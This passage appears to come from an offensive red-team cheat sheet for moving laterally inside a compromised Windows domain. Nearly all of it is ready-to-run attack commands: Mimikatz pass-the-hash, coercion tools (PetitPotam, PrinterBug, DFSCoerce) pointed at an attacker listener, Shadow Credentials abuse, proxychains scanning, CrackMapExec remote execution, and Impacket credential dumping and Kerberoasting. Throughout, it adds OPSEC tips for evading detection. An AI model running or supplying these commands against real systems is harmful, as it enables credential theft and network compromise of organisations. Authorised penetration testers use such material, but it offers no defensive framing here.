$ ssh -R 8080:127.0.0.1:80 user@compromised_host.corp.local
# Reverse dynamic port forwarding (SOCKS)
$ ssh -R 1080 user@compromised_host.corp.local
# OPSEC: SSH is common in Linux environments
# Use for mixed Linux/Windows environments
Windows Built-in Pivoting#
Usage: Use native Windows tools for pivoting (no additional tools).
# Method 1: runas with /netonly
beacon> shell runas /netonly /user:CORP\jdoe "mmc.exe"
# Method 2: Mimikatz Pass-the-Hash
beacon> mimikatz !sekurlsa::pth /domain:CORP /user:jdoe /ntlm:<hash> /run:mmc.exe
# Method 3: PowerShell with credentials
beacon> powerpick $cred = Get-Credential
beacon> powerpick Invoke-Command -ComputerName 10.10.20.10 -Credential $cred -ScriptBlock {whoami}
# Method 4: Browser-based pivoting
# Configure FoxyProxy in Edge/Chrome with SOCKS proxy
# Access internal web applications through browser
# OPSEC: Native methods don't require file uploads
# Blend with legitimate administrative activity
Coercion Attacks for Lateral Movement#
PrinterBug (SpoolSample)#
Usage: Coerce authentication from target machine for relay/capture.
# Coerce target to authenticate to our listener
beacon> execute-assembly C:\Tools\SharpSystemTriggers\SharpSpoolTrigger\bin\Release\SharpSpoolTrigger.exe dc01.corp.local attacker.corp.local
# Alternative: Use Rubeus to monitor for incoming ticket
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe monitor /interval:5 /nowrap
# Capture incoming authentication with Inveigh (NTLM relay)
beacon> powershell-import C:\Tools\Inveigh\Inveigh.ps1
beacon> powerpick Invoke-Inveigh -ConsoleOutput Y -LLMNR Y -NBNS Y -mDNS Y -Challenge 1122334455667788
# OPSEC: Exploits MS-RPRN (Print Spooler) protocol
# Works against most Windows versions
# Generates Event ID 307 (print spooler activity)
PetitPotam#
Usage: Coerce NTLM authentication via MS-EFSRPC protocol.
# Unauthenticated coercion (works on unpatched systems)
beacon> execute-assembly C:\Tools\PetitPotam\PetitPotam.exe attacker.corp.local dc01.corp.local
# Authenticated coercion
beacon> execute-assembly C:\Tools\PetitPotam\PetitPotam.exe -d corp.local -u jdoe -p password attacker.corp.local dc01.corp.local
# OPSEC: Exploits EFS RPC protocol
# Microsoft patched in 2021, but many systems unpatched
# Use authenticated version if unauthenticated blocked
DFSCoerce#
Usage: Coerce authentication via MS-DFSNM protocol.
# Coerce via DFS
beacon> execute-assembly C:\Tools\DFSCoerce\DFSCoerce.exe -d corp.local -u jdoe -p password attacker.corp.local dc01.corp.local
# OPSEC: Alternative to PrinterBug/PetitPotam
# Works when other methods patched/blocked
Shadow Credentials Attack#
Usage: Abuse msDS-KeyCredentialLink for authentication coercion.
# Add key credential to computer object (requires write permissions)
beacon> execute-assembly C:\Tools\Whisker\Whisker.exe add /target:srv01$ /domain:corp.local /dc:dc01.corp.local
# Authenticate using certificate
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:srv01$ /certificate:<base64_cert> /password:<cert_password> /domain:corp.local /nowrap
# Remove key credential (cleanup)
beacon> execute-assembly C:\Tools\Whisker\Whisker.exe remove /target:srv01$ /domain:corp.local /dc:dc01.corp.local /deviceid:<device_id>
# OPSEC: Requires write access to msDS-KeyCredentialLink attribute
# Stealthier than Kerberoasting (no service ticket request)
Network Reconnaissance Through Pivot#
Network Scanning via SOCKS#
Usage: Scan internal networks through compromised host.
# TCP connect scan (no ICMP, no raw sockets)
$ proxychains nmap -n -Pn -sT -p445,3389,5985,5986 10.10.20.0/24 --open
# Service version detection
$ proxychains nmap -n -Pn -sT -sV -p445 10.10.20.0/24
# Script scanning
$ proxychains nmap -n -Pn -sT -p445 --script smb-os-discovery 10.10.20.10
# Fast scan of common ports
$ proxychains nmap -n -Pn -sT -F 10.10.20.0/24
# OPSEC: Use -T2 timing for stealthier scans
# Avoid UDP scans through SOCKS (not supported well)
# Use CrackMapExec for AD-specific reconnaissance
CrackMapExec via SOCKS#
Usage: Enumerate and exploit through SOCKS proxy.
# SMB enumeration
$ proxychains crackmapexec smb 10.10.20.0/24
# SMB with credentials
$ proxychains crackmapexec smb 10.10.20.0/24 -u jdoe -p password -d CORP
# SMB with hash
$ proxychains crackmapexec smb 10.10.20.0/24 -u jdoe -H <ntlm_hash> -d CORP
# Check local admin access
$ proxychains crackmapexec smb 10.10.20.0/24 -u jdoe -p password -d CORP --local-auth
# Execute commands via SMB
$ proxychains crackmapexec smb 10.10.20.10 -u admin -p password -x "whoami"
# WinRM enumeration
$ proxychains crackmapexec winrm 10.10.20.0/24 -u jdoe -p password -d CORP
# MSSQL enumeration
$ proxychains crackmapexec mssql 10.10.20.0/24 -u sa -p password
# LDAP enumeration
$ proxychains crackmapexec ldap 10.10.20.10 -u jdoe -p password -d CORP --users
# OPSEC: CrackMapExec is fast and efficient
# Can be noisy (mass authentication attempts)
# Use --timeout to slow down for stealth
Impacket Suite via SOCKS#
Usage: Use Impacket tools through SOCKS proxy.
# PSExec
$ proxychains impacket-psexec CORP/jdoe:password@10.10.20.10
# WMIExec (stealthier than PSExec)
$ proxychains impacket-wmiexec CORP/jdoe:password@10.10.20.10
# SMBExec
$ proxychains impacket-smbexec CORP/jdoe:password@10.10.20.10
# DCOMExec
$ proxychains impacket-dcomexec CORP/jdoe:password@10.10.20.10
# Secretsdump (credential extraction)
$ proxychains impacket-secretsdump CORP/jdoe:password@10.10.20.10
# GetUserSPNs (Kerberoasting)
$ proxychains impacket-GetUserSPNs CORP/jdoe:password -dc-ip 10.10.20.10 -request
# GetNPUsers (ASREPRoasting)
$ proxychains impacket-GetNPUsers CORP/jdoe:password -dc-ip 10.10.20.10 -request
# OPSEC: Impacket tools are Python-based and flexible
# Support multiple authentication methods (pass-the-hash, Kerberos)
# Use -k flag for Kerberos authentication (stealthier)